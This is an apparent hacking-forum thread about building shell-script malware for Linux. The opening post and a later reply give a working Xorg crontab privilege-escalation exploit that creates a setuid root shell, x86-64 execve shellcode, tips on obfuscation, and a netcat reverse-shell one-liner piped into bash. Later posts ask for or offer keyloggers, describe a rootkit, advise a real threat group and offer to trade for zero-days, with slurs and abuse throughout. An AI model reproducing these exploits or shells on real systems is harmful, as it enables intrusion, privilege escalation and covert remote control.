User Controls
Sh/Bash based malware for *Nix.
-
2021-07-24 at 7:24 AM UTCWelcome to another edition of Sophie's Cyber Shenanigans. This thread, i got some unconventional ways to work on *Nix based malware. And a couple questions for the level 97 shell script wizards.
So i am experimenting with shell scripts, to find out what is and isn't viable should i want to create a shell script based malware for loonix. Why shell script? They're easily obfuscated, a bunch of utils have PE/Static binary formats you can bring along, or deploy remotely, and all distros have `Sh` and almost always `Bash` as far as i am aware.
What's more, shell scripts, allow one to invoke commands and operations from any scripting lang that have their interpreter installed on the distro you are targeting 'out of the box' as it. Which tend to be quite a few.
Chances are you'll have access to: Perl, Python, Lua, TclSh, M4(Plus other Macro 'langs') and if you're lucky PHP, Ruby, Node and so on and so forth.
Another benefit of using `Sh` or `Bash` is that you don't have to worry about compatibility issues. Should you want to make use of payloads written in let's say C, you have the opportunity to perform Recon simply with the `uname -svm` command and then you'll have the proper architecture and kernel version. Which is great to know if you want to write an exploit for the system you're on.
Here's an example.
#!/bin/bash
# There are a bunch of vulns in the Xorg server and related utils like
#
# X.Org xorg-x11-xfs - Local Race Condition
# xorg-x11-server - 'inittab Local Privilege Escalation
#
# And much more, we're gonna do the second one as an example
#
# When ##!!## occurs in the script i got some annotations below
#
cat << EOF > /tmp/x_orgasm
cp /bin/sh /usr/local/bin/pwned ##!!##_1
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
gcc /tmp/pwned.c -o /usr/local/bin/pwned ##!!##_2
chmod 4777 /usr/local/bin/pwned
EOF
chmod +x /tmp/x_orgasm
# prepare your anus
cd /etc
Xorg -fp "* * * * * root /tmp/x_orgasm" -logfile crontab :1 & ##!!##_3
sleep 5
pkill Xorg ##!!##_4
sleep 120
ls -l /etc/crontab*
ls -l /usr/local/bin/pwned
# Start elevated Sh
/usr/local/bin/pwned
##!!##_1
Before you say: you can't just copy /bin/sh. Well we don't really need to the line after that builds a Sh shell too.
If you're afraid we won't have permissions for `gcc` here's something that'll do exactly the same with UID 0.
Alternatively we could ship a shell in Asm with the payload up top.
##!!##_2
/tmp and some of the other directories featured here get mounted as NOSUID which is good. Because NOSUID beats root.
/usr/local/bin is part of the $PATH and has MODE 2775/drwxrwsr-x
##!!##_3
The operation here is what triggers the bug. Without getting too much into the weeds killing Xorg at ##!!##_4 with pkill will cause inittab to retart the cronjob related to Xorg that we changed with the operation we ran previously which then starts our 'pwned' Sh with root privileges.
Obfuscation
There's tools to obfuscate bash. Which is great. Here's an example of this same script obfuscated with the methods below.
String/Hex Hash, 1 Iteration
Token/ForCode, 1 Iteration
Find the result here
Or if you prefer a picture check the spoiler out below.
Anyway, i hope you found that informative. However before you go i do actually have a question for the level 97 shell script wizards.
I want to have a function in a shell script that i can call with different commands, so `cmd_func cat /etc/passwd`. My current implementation looks like this:
#!/usr/bin/env -S sh\_"umask\_700"\_-f
# BTW This is legal right ^
#
# I'm U_masking because i am writing stuff out
# Under a specific user account
buff_ops()
{ # I want to run it through a FIFO pipe/buffer in fact it is a requirement.
cmd=$0
arg=$1
mknod u_dev p && cat < `read -t (${cmd $'\0' arg})` 0<u_dev | /bin/bash 1>u_dev
};
buff_ops CMD ARG # <- is what i want
I figured it should be good since stuff like this works also:
rm -f x; mknod x p && nc 192.168.1.10 1337 0<x | /bin/bash 1>x
Thicc threads niggas. One on low level security and dev incoming soon as well.The following users say it would be alright if the author of this post didn't die in a fire! -
2021-07-24 at 12:10 PM UTCI know a little about python. Do you have any keyloggers that would email to any email? Preferably something besides gmail.
And is there anyway to get something to autorun on windows without an arduino? With a flash drive or dvd? -
2021-07-25 at 7:41 AM UTC
-
2021-07-25 at 11:58 PM UTCI also have a keylogger that'll send you the data over UDP, one byte at a time. Which is good because that makes it more stealth. Would you like some random malware sir? I got malware out the ass, custom made by yours truly, OSS, and BH.
We'll do luck of the draw. I'll number 10 random malwares, you pick a number. Ready?
rand=$[ $RANDOM % 10 ] && echo -e $rand
Anyway, i wish more people would be interested or competent in terms of *Nix malware. -
2021-09-25 at 1:12 PM UTCI'm an inspiration to Threat Actors all around the world.
https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera
Sh/Bash based malware is the future of loonix malware. Using native utils for offensive operations is almost always superior to shipping in a whole ass malware, especially with regards to Linux, no compatibility issues. It's great. -
2021-09-25 at 4:10 PM UTCIn the xorg hack, why do you bother with the cp of /bin/sh when you already write that with gcc and chmod it?
-
2021-09-25 at 4:11 PM UTC
-
2021-09-25 at 4:23 PM UTCAlso TeamTNT, if you're reading this. Don't download your payloads from a C2 server that literally has the name of the Operation in the domain. And, you guys need to obfuscate that shell script. I got a couple really good ways among my TTPs but if i share them they won't be as effective any more.
I can design a new Obfuscation method however. And you guys should be able to as well, if you can't i'll trade a custom designed method, for something of equal value. Preferably 0day. Ok admittedly that's a steep price.
All of this is for legitimate research purposes of course.
edit: Oops * shell script not shell code lol -
2021-09-25 at 4:34 PM UTC
-
2021-09-25 at 4:48 PM UTC
-
2021-09-25 at 5:05 PM UTC
-
2021-09-25 at 6:05 PM UTCIf you look closely at this part:
cat << EOF > /tmp/x_orgasm
cp /bin/sh /usr/local/bin/pwned ##!!##_1
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
gcc /tmp/pwned.c -o /usr/local/bin/pwned ##!!##_2
chmod 4777 /usr/local/bin/pwned
EOF
You can tell that the operation above writes out everything between EOFto the /tmp directory, after which it's made execuyable with chmod +x. That means it can be run as a shell script.
Here we are making sure that cronjob related to Xorg which has the permissions required will start the script in /tmp with the permissions we need.
cd /etc
Xorg -fp "* * * * * root /tmp/x_orgasm" -logfile crontab :1 & ##!!##_3
sleep 5
pkill Xorg
Once the script is executed with the new permissions we can do the operations defined there without issue.
Even if something goes wrong i write this:
global _start
section .text
_start:
push 59
pop rax
cdq
push rdx
mov rbx, 0x6363672f6e69622f
push rbx
mov rbx, 0x7273752f2f2f2f2f
push rbx
push rsp
pop rdi
push rdx
mov rbx, 0xffffffff9cd19b9a
not rbx
push rbx
mov rbx, 0x91888fd08f928bd0
not rbx
push rbx
push rsp
pop r8
push rdx
mov rbx, 0xffffffffffff90d2
not rbx
push rbx
push rsp
pop r9
push rdx
mov rbx, 0xffffffff9b9a9188
not rbx
push rbx
mov rbx, 0x8fd091969dd0939e
not rbx
push rbx
mov rbx, 0x9c9093d08d8c8ad0
not rbx
push rbx
push rsp
pop r10
push rdx
push rsp
pop rdx
push r10
push r9
push r8
push rdi
push rsp
pop rsi
syscall
What that does is invoke gcc with execve with UID 0, so the shell we wrote out with
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
gets compiled the way we want to regardless of system permissions. -
2021-09-25 at 6:07 PM UTCIt's not called exploits for nothing (n_n")
-
2021-09-25 at 7:24 PM UTCThe following users say it would be alright if the author of this post didn't die in a fire!
-
2021-09-26 at 12:25 AM UTC
Originally posted by troon You don't have a fucking clue what you're talking about, do you?
Last i checked you were the one that was asking a million questions about the subject at hand. See those four 'thanks' my post got those are from people who definitely know what they are talking about. Just because you're too fucking ignorant to understand what's going on in this thread doesn't mean that everyone is as incompetent as you. I even fucking spelled it out for you. If everyone else here understands the subject matter then maybe you should consider tat you're actually the one that doesn;t have a fucking clue.
Why don't you shut the fuck up read up on offensive security and shell scripting, and look into the vulnerability i mentioned in the OP. Then come back and to talk shit to me.The following users say it would be alright if the author of this post didn't die in a fire! -
2021-09-26 at 7:22 AM UTCI wish I had more time for shit like this
The things you regret at the end and why lol irony is a bitch -
2021-09-26 at 6:04 PM UTC
Originally posted by Sophie Last i checked you were the one that was asking a million questions … <crap> … I even fucking spelled it out for you
You spelled fuck all out. You were talking total shit. Because you know shit.
"Also, TeamTNT..." - you are having a fucking laugh. Or retarded, not sure yet. -
2021-10-07 at 2:49 AM UTCnice xorg vuln, is it a zero-day? I've never seen it before.. if it's 0day then damn nice :P
also, nice thread in general. I've got a ring3/userland linux rootkit based on DR0 (debug register, as opposed to LD_PRELOAD / dynamic linker) which I'll post tomorrow... it's multi-arch too (inline asm for each architecture.. itt'l use uname -m or /proc entries to detect the architecture in use, then run the relevant arch-specific inline assembly from there).
Also, I said it's userland... well, that's not fully true. It's also active in kernelspace. It's just residing in userland/ring3 rather than at ring0, so that if the fucker updates their kernel they're still hooked. So basically it's living in userland but is performing ring3->ring0 hooking
I suck dick at C(++), ASM, and kernel stuff in general... so I'm actually really fucking happy with how this kit has been coming along. It's only the 2nd kit I ever wrote too. First used LD_PRELOAD.
The bash obfuscation you posted has inspired me to post a thread detailing a bunch of my bash obfuscation tricks, too :)
EDIT:
lol... do we know eachother btw? If so, who are you? PM if you don't wanna reveal your nick here.
Just noticed you posted this https://niggasin.space/thread/5020 (that fuzzer is incredibly gross btw lmao wrote it for the memez hence the goto(); sphagetti code, zero bound checks anywhere, and user inputs passed to syscalls errywhere. I wrote a proper flash fuzzer in ruby. I'll upload that one for you. It uses the same lists, but it opens proper sockets etc rather than doing fucking gnome-www-browser loool) -
2021-10-07 at 11:22 AM UTCAre you maybe a schizo-posting pedo?
A zero day multi-arch ring3 to ring0? I fucking wait with bated breath.
I'm not sure whether to laugh or cringe. -
2021-10-07 at 1:16 PM UTCI got a DoS zero-day in a single line of pure bash script:
sudo shutdown -h now
Let me walk you through it.
The 'sudo' command does stuff.
The 'shutdown' command is self-explanatory. It shuts things down.
The '-h' is what we call a 'flag', but I've seen it referred to as a 'parameter'.
And the 'now' command is in there, but I don't really know what it does. DO NOT OMIT IT OR THE HACK WILL NOT WORK.
If it asks for a password, then you're on your own. I can't help you on that bit.
Oh, if anyone from Fin7 is reading this, can you pick up a carton of semi-skimmed from the shops on your way home?
You're all welcome.
